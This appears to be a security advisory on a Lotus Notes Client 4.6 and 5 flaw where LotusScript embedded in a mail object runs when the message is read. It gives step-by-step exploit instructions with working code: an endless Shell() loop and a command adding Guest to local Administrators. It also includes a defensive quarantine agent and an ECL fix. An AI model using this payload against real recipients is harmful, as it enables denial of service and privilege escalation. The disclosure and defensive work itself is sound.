Summary:
A security vulnerability in Lotus Notes Mail allows a user to embed LotusScript (Notes' built-in interpreted language) with malicious intent in a mail message and have it execute on the recipient's workstation without the recipient's consent or knowledge.
Credit:
The information has been provided by Yann. Workarounds were suggested by Dan Melamed, Tiensuu Mikael and kenneth at ecab.se.
Vulnerable systems:
Lotus Notes Client 5 All releases
Lotus Notes Client 4.6 All releases
Details:
With a little LotusScript in a mail message you can execute anything you want on the recipient's computer, including programs outside Notes. The script is attached to an embedded object and fires when the recipient merely opens (reads) the message.
Follow these steps:
1) Create a new mail and add the recipients
2) Go to the body and choose "Create..Object" from the menu
3) Select "Control" and any object you please, such as "ActiveXPlugin Object"
4) Do one of the following:
In Client 4.6, right-click on the object to get "Properties"
In Client 5, use the new "Applet" menu entry, go to "Properties" and check "run the object when the document is read"
5) Then select "Edit events": an event pane opens, linked to the object
6) In the "Initialize" section add the following code, where "My EMAIL" is your own Lotus Notes account name (if you get this part wrong, you will bomb yourself when you open the sent copy):
Sub Initialize
    Dim TaskId As Integer
    Dim session As New NotesSession
    ' Skip the author's own mailbox so the sender is not hit by the sent copy
    If session.CommonUserName <> "My EMAIL" Then
        Do
            ' Shell() starts an external program; here the calculator, forever
            TaskId% = Shell("CALC.EXE", 1)
        Loop
    End If
End Sub
7) In the "Terminate" section, do the same:
Sub Terminate
    Dim TaskId As Integer
    Dim session As New NotesSession
    ' Same payload on the Terminate event, so closing the mail fires it too
    If session.CommonUserName <> "My EMAIL" Then
        Do
            TaskId% = Shell("CALC.EXE", 1)
        Loop
    End If
End Sub
8) Click again on the "Initialize" section
9) Hit the "Send" button
Your ActiveX control (or whatever object you chose) is executed while the recipient reads the document.
In this example we merely run the calculator in an endless loop, but the possibilities are unlimited: formatting hard drives, sending mail, replicating the script to everyone in the victim's address book, sending files out, or stealing files from the victim's hard drive without the victim noticing.
For instance, you could replace the Do .. Loop with the following (in LotusScript a literal double quote inside a string is written as two double quotes):
TaskId% = Shell("CMD.EXE /C net localgroup ""Administrators"" guest /add", 1)
This adds the Guest account to the local Administrators group. Note that the NET command only succeeds if the victim is running Notes with local administrator rights on Windows NT; on that account the script runs with every privilege the logged-on user has.
NOTE: The SMTP gateway does not let the embedded object and its LotusScript pass through, so this attack only works between Notes clients over native Notes mail routing, making it an internal threat only.
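As an added example, not taken from the advisory, here is a LotusScript agent a Notes administrator could run against a mail file to find and quarantine messages that carry the kind of embedded OLE object or control the attack above relies on. It assumes the mail file is the current database, that incoming mail lives in the "($Inbox)" folder, and that a folder named "Suspect Objects" may be created for quarantine; all three are assumptions, not facts stated on the page.

```lotusscript
' Added example, not part of the original advisory.
' Scans ($Inbox) of the current mail file for messages whose Body holds an
' OLE object or OLE link (the carrier of Initialize/Terminate scripts) and
' moves them to a quarantine folder. Plain file attachments are left alone.
%INCLUDE "lsconst.lss"   ' defines EMBED_OBJECT, EMBED_OBJECTLINK and RICHTEXT

Sub Initialize
    Dim session As New NotesSession
    Dim db As NotesDatabase
    Dim inbox As NotesView
    Dim doc As NotesDocument
    Dim nextDoc As NotesDocument
    Dim flagged As Integer

    Set db = session.CurrentDatabase
    Set inbox = db.GetView("($Inbox)")    ' assumption: this is a mail file
    If inbox Is Nothing Then
        Print "($Inbox) not found; is the current database a mail file?"
        Exit Sub
    End If

    Set doc = inbox.GetFirstDocument
    Do While Not doc Is Nothing
        ' Fetch the successor before touching folders: RemoveFromFolder
        ' changes the folder we are walking.
        Set nextDoc = inbox.GetNextDocument(doc)
        If HasEmbeddedControl(doc) Then
            flagged = flagged + 1
            Print "Suspect object in mail from " & doc.GetItemValue("From")(0) & _
                ": " & doc.GetItemValue("Subject")(0)
            ' "Suspect Objects" is an assumed folder name; True creates it if missing
            Call doc.PutInFolder("Suspect Objects", True)
            Call doc.RemoveFromFolder("($Inbox)")
        End If
        Set doc = nextDoc
    Loop
    Print "Scan finished, " & flagged & " message(s) quarantined"
End Sub

' Returns True when the Body rich text item contains an OLE object or OLE
' link, i.e. an object of the kind created via Create..Object..Control.
' MIME messages (Body is not RICHTEXT) cannot carry Notes OLE objects and
' are skipped, which matches the advisory's note about the SMTP gateway.
Function HasEmbeddedControl(doc As NotesDocument) As Integer
    Dim body As Variant
    Dim objs As Variant
    HasEmbeddedControl = False
    If Not doc.HasEmbedded Then Exit Function
    Set body = doc.GetFirstItem("Body")
    If body Is Nothing Then Exit Function
    If body.Type <> RICHTEXT Then Exit Function
    objs = body.EmbeddedObjects
    If IsEmpty(objs) Then Exit Function    ' attachments only, no objects
    Forall o In objs
        If o.Type = EMBED_OBJECT Or o.Type = EMBED_OBJECTLINK Then
            HasEmbeddedControl = True
        End If
    End Forall
End Function
```

The agent only looks at the object type, not at the script attached to it, so it flags every mail carrying an OLE object or control, harmless or not; in an environment where such objects are rarely mailed that is an acceptable trade, and it keeps the check independent of how a given Notes release stores the object's event code. It is a compensating control, not a replacement for the ECL fix below.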
Solution:
The solution is to deploy a proper ECL (Execution Control List) across the company. The workstation ECL decides, per signer, which operations code is allowed to perform, such as accessing the file system or running external programs (the "Access to external programs" right is what Shell() needs). Granting those rights only to a handful of trusted signers, and nothing to unsigned code or to the default entry, eliminates the problem completely. Users can also tighten their own ECL (File..Tools..User Preferences..Security Options) so that no one else's code is allowed to execute such operations on their workstation.
For more information see:
http://www.notes.net/today.nsf/8a6d147cf55a7fd385256658007aacf1/3a9da544637a69b2852568310078b649?OpenDocument